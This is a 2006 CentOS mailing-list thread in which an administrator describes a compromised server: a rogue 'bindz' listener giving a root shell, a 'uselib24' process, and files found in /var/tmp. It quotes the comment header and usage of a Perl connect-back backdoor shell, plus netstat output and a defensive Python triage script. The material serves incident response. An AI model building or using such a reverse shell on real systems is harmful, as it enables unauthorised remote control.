[CentOS] Uselib24/bindz - owned!
Rick Philbrick
rickphilbrick at gmail.com
Thu May 4 05:31:56 UTC 2006
Hi,
Well that's telling. So do you have chkroot-kit installed? Although
you know you've got to have a root-kit on there. Anyway, it may help
narrow your search of the directories and the changes within.
-rickp
On 5/3/06, Nick <list at everywhereinternet.com> wrote:
> So pretty sure one of my boxes has been owned. Just wanted some advice
> on what to do next. Obviously, I'll need to nuke the fecker and start
> over but it would be really nice to find out how they got in as it's a
> CentOS 4.3 which is bang up to date.
>
> So i found:
>
> PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
> 7052 apache 25 0 27320 5348 8 R 99.0 0.5 736:52 0 uselib24
>
> [root at box tmp]# netstat -lnp |more
> Active Internet connections (only servers)
> Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
> tcp 0 0 0.0.0.0:32768 0.0.0.0:* LISTEN 3012/rpc.statd
> tcp 0 0 127.0.0.1:32769 0.0.0.0:* LISTEN 3138/xinetd
> tcp 0 0 0.0.0.0:66 0.0.0.0:* LISTEN 3124/sshd
> tcp 0 0 0.0.0.0:9865 0.0.0.0:* LISTEN 7031/bindz
> tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 14534/mysqld
> tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2993/portmap
> tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 7031/bindz
> tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 3138/xinetd
> tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 3578/vsftpd
> tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 10707/sendmail: acc
> tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 7031/bindz
>
> Bindz.... hmm. Telnetting to the port gave me a root shell - nice. My
> firewall scripts should block that port but I don't know if they're
> working now :(
>
> Contents of /var/tmp were:
>
> -rwxrwxr-x 1 apache apache 19429 Jan 10 16:20 bindz
> -rw-r--r-- 1 apache apache 2100 Jan 8 21:32 dc.txt
> -rwxrwxr-x 1 apache apache 479843 Aug 3 2005 uselib24
>
> dc.txt started:
>
> #!/usr/bin/perl
> use IO::Socket;
> #IRAN HACKERS SABOTAGE Connect Back Shell
> #code by:LorD
> #We Are :LorD-C0d3r-NT
> #Email:LorD at ihsteam.com
> #
> #lord at SlackwareLinux:/home/programing$ perl dc.pl
> #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
> #
> #Usage: dc.pl [Host] [Port]
> #
> #Ex: dc.pl 127.0.0.1 2121
> #lord at SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
> #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
> #
> #[*] Resolving HostName
> #[*] Connecting... 127.0.0.1
> #[*] Spawning Shell
> #[*] Connected to remote host
>
> I might e-mail him and thank him.
>
> So what next?
>
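A small triage script for the "so what next?" question, added here as an example and not code from the list post or from CentOS. It parses the netstat -lnp listing Nick posted (rejoined into one line per socket) and flags listeners that are unknown, hold a port the baseline assigns to another daemon, or run out of /tmp or /var/tmp as bindz did. The EXPECTED port map is an assumed baseline for this host (sshd on 66 is taken as deliberate), and resolve is a hook for /proc/<pid>/exe on a live machine.

```python
import re

# Constructed sample: the netstat -lnp listing from the post, rejoined into one
# line per socket (the mail client had wrapped each entry across two lines).
SAMPLE = """\
Proto Recv-Q Send-Q Local Address   Foreign Address State  PID/Program name
tcp   0 0 0.0.0.0:32768   0.0.0.0:* LISTEN 3012/rpc.statd
tcp   0 0 127.0.0.1:32769 0.0.0.0:* LISTEN 3138/xinetd
tcp   0 0 0.0.0.0:66      0.0.0.0:* LISTEN 3124/sshd
tcp   0 0 0.0.0.0:9865    0.0.0.0:* LISTEN 7031/bindz
tcp   0 0 0.0.0.0:3306    0.0.0.0:* LISTEN 14534/mysqld
tcp   0 0 0.0.0.0:111     0.0.0.0:* LISTEN 2993/portmap
tcp   0 0 0.0.0.0:80      0.0.0.0:* LISTEN 7031/bindz
tcp   0 0 0.0.0.0:113     0.0.0.0:* LISTEN 3138/xinetd
tcp   0 0 0.0.0.0:21      0.0.0.0:* LISTEN 3578/vsftpd
tcp   0 0 127.0.0.1:25    0.0.0.0:* LISTEN 10707/sendmail: acc
tcp   0 0 0.0.0.0:443     0.0.0.0:* LISTEN 7031/bindz
"""
# Assumed baseline for this host (sshd on 66 taken as deliberate): which daemon should own each port.
EXPECTED = {21: "vsftpd", 25: "sendmail", 66: "sshd", 80: "httpd", 111: "portmap",
            113: "xinetd", 443: "httpd", 3306: "mysqld"}
KNOWN = set(EXPECTED.values()) | {"rpc.statd"}
LINE = re.compile(r"^(tcp|udp)6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+(?:LISTEN\s+)?(\d+)/(\S+)")

def parse_listeners(text):
    """Return (proto, addr, port, pid, program) tuples from netstat -lnp output."""
    rows = []
    for m in filter(None, map(LINE.match, text.splitlines())):
        proto, addr, port, pid, prog = m.groups()
        rows.append((proto, addr, int(port), int(pid), prog.rstrip(":")))
    return rows

def suspicious_path(path):
    """True when a listener's binary lives in a scratch directory, as bindz did."""
    return path is not None and path.startswith(("/tmp/", "/var/tmp/", "/dev/shm/"))

def triage(listeners, resolve=lambda pid: None):
    """Flag unknown programs, ports owned by the wrong daemon and binaries run from
    scratch dirs; on a live host pass resolve=lambda p: os.readlink(f"/proc/{p}/exe")."""
    findings = []
    for proto, addr, port, pid, prog in listeners:
        if prog not in KNOWN:
            findings.append(f"unknown program {prog} (pid {pid}) listening on {proto}/{port}")
        if port in EXPECTED and EXPECTED[port] != prog:
            findings.append(f"port {port} owned by {prog}, expected {EXPECTED[port]}")
        exe = resolve(pid)  # None offline; /proc/<pid>/exe target on a live host
        if suspicious_path(exe):
            findings.append(f"pid {pid} ({prog}) runs from scratch dir {exe}")
    return findings
```

On the sample every finding names bindz: three unknown-program hits (9865, 80, 443) plus the two port-owner mismatches on 80 and 443, which is exactly the picture in the post.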